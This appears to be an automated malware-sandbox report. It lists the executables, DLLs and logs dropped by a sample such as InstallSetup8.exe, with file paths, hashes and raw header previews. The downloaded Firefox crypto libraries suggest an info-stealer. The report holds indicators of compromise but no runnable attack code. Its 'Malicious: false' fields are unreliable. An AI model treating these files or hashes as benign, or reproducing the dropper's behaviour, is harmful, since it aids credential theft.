Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\xQfUeydaBrjuHptx.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3632640
Entropy (8bit):	6.982049154160612
Encrypted:	false
SSDEEP:
MD5:	9C815131562310CCECBBE81C49E57029
SHA1:	71B782B3C19123B2C6AAB622ED365ACFB8110CBA
SHA-256:	4954AE0F16D41249DA84F1FCA804B5E38D4AB9E637F8AE41C8FD65B14DF256BC
SHA-512:	5734AE24418BE7A6249EB5CB955E84871148BBD6DEE75DA467C0247905DE7327B165B5153C3312E43D14FB1B547EE584034FF1BD29C45246C0B2A32E8CF6D37C
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.e.........."...0..j7...........7.. ....7...@.. ........................7...........@...................................7.S.............................7...................................................... ............... ..H............text....i7.. ...j7................. ..`.reloc........7......l7.............@..B..........................................................7.....H............).....b....................................................(.......8.Y........ir.....~.(.......8.Y..S.$k.....H...)hL`............HN.{......5H....]f.9U."T.;..g,........>[A......;u.X,RqN,...H"l.Xi..D.Y..../.....)..,.j.....8..O.\|oV...s].....XsBl..l..D....?.kM.5.X.."..CL...../.W..=.............3.b..).]1....dA.%..6.#..%..\>..^...s....'..p%d......i?....G...84N.y.;>.:.H......m8.aC..z.=...E."o......l!B..M/.g.._..s...Z...<.7C.,.Q...."F@~...iq.j0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\C086.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\C086.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.355760272568367
Encrypted:	false
SSDEEP:
MD5:	FC3575D5BE1A5405683DC33B66D36243
SHA1:	1C816D34B7D5B96E077DC3EF640BA8C7BA370502
SHA-256:	1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
SHA-512:	68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\F38F.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\F38F.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2020
Entropy (8bit):	5.352640624208633
Encrypted:	false
SSDEEP:
MD5:	1820783460640EE3A5B216BE1A8C8BAE
SHA1:	E94E1039090EB9AA4B7C473C4921E84A9B62EB88
SHA-256:	6684103BDBB8BBA7F861D06BC7F43CA2D70F144BC99F085F55088BEBD772F0B8
SHA-512:	B003726B25E0DFD1668165C51034BC2FF7A77977A7EC1CD31283713EBD118B5B732F907A33B546A49471029040E5BCC2D91F0992A8D202F5121E7EE9779AC00D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\33A6.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\33A6.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4854.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\4854.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\780F.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\780F.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\88D9.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\88D9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\928F.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\928F.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CFAA.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\CFAA.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2545
Entropy (8bit):	5.330114603578639
Encrypted:	false
SSDEEP:
MD5:	FA369B3B2029B34A356FF646A278D2A6
SHA1:	BBEA84BDD9CEDF32C51AAC4F95E82B105BCF81BF
SHA-256:	3E580E661FF83779E4B6CDA9B21DC7DBEEF781755605DB82F5377EB2132DAA48
SHA-512:	C9A1EBCEFC42473B13C4F25910F69DB458E4F3E8D0858ECB9143E997E004FA67665F9AE9735D086EABC22D4D115EDB77011B8225CC18C2DBDAADB75D55A1ED77
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicK

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Reputation:	unknown
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002c.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	108328
Entropy (8bit):	4.0213505672786
Encrypted:	false
SSDEEP:
MD5:	CE3A1138760DF2912AD0071B1E42A283
SHA1:	6D821FD62262C3BD839EC7096652B961696524A6
SHA-256:	FDC5948061D5A2380FC73BB3832736CAE37E4B8AD653FEBDE0C3756464901189
SHA-512:	1A2C7AB90DF601E0F7BFCE8102E18325CEECCF6C81310D9FA95B9D36C0845512C19D3DEA0C7061FD6FD221B4B7EB849D244B70D1C1C57C43CC2E65EB140048C9
Malicious:	false
Reputation:	unknown
Preview:	....h... ...(...........P...............[...0...`.......................Y.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107504
Entropy (8bit):	4.027830831009417
Encrypted:	false
SSDEEP:
MD5:	69AAE512D65F0639509D006C6C888627
SHA1:	02D7F14B49933AF4B39E3CB772BB997C99BCBAE6
SHA-256:	3CACB9E4ECE4C7EF8ABDBCCC12FCAD83DDDA7AF33452362064D1A98B1ADF878C
SHA-512:	47E20183A5AEF0CE4F0D9184A9D1F25A4397BE54F049267068F2DAB95F62FEF79A17500747CA8476BE5E6B39216213EDF50EE042E349205068AA5A53511A2F54
Malicious:	false
Reputation:	unknown
Preview:	....h... ..............P...............[.......`...H..............x...Y.......e.n.-.C.H.;.e.n.-.G.B...............h..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7QY6A91A.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	12
Entropy (8bit):	2.1258145836939115
Encrypted:	false
SSDEEP:
MD5:	416B4BAB4CCD524D0B3EB958E5486867
SHA1:	E5E94B6F9F22E9FCD96613544935E9948B523E55
SHA-256:	BE4EFD67A84F76F86829B7CE4AE4F0E2C091C778D2E2AF9D6A3BC4EA6AB7D396
SHA-512:	306BFF69AC28C25504276FC96CFFB620F38D9127244E20078E4D44805B87DDA541E51D2246CA9BDE0D48BCFE79DB94402CC735F89BF6679B917985596A9FC956
Malicious:	false
Reputation:	unknown
Preview:	212.102.41.2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\syncUpd[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	183808
Entropy (8bit):	6.997216731878316
Encrypted:	false
SSDEEP:
MD5:	F2AD59753E17F68CF6F6F251E0D4DEEC
SHA1:	1FB2EA00DEA61357F260892A71E760B80FAF8C68
SHA-256:	24A617155FAB47FEA082076061BB97CC3B16C03C84691DC1CE62675764D587DA
SHA-512:	414BADB28F29FE7A3199AA7B909283E02EC06141E0EF99BAAA6E9FFC450D37BAC70EC7A7DBBA41FE217E40156142DC6BDAE4DE4A3BD79B69373E3307F1E7B5D1
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L....l.d.....................B......<.......@....@...........................D.....i.......................................(k..d.....D.@Q...........................A...............................^..@............@...............................text....(......................... ..`.rdata..~4...@...6..................@..@.data...\|.B..........d..............@....rsrc...@Q....D..R...\|..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\plus[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
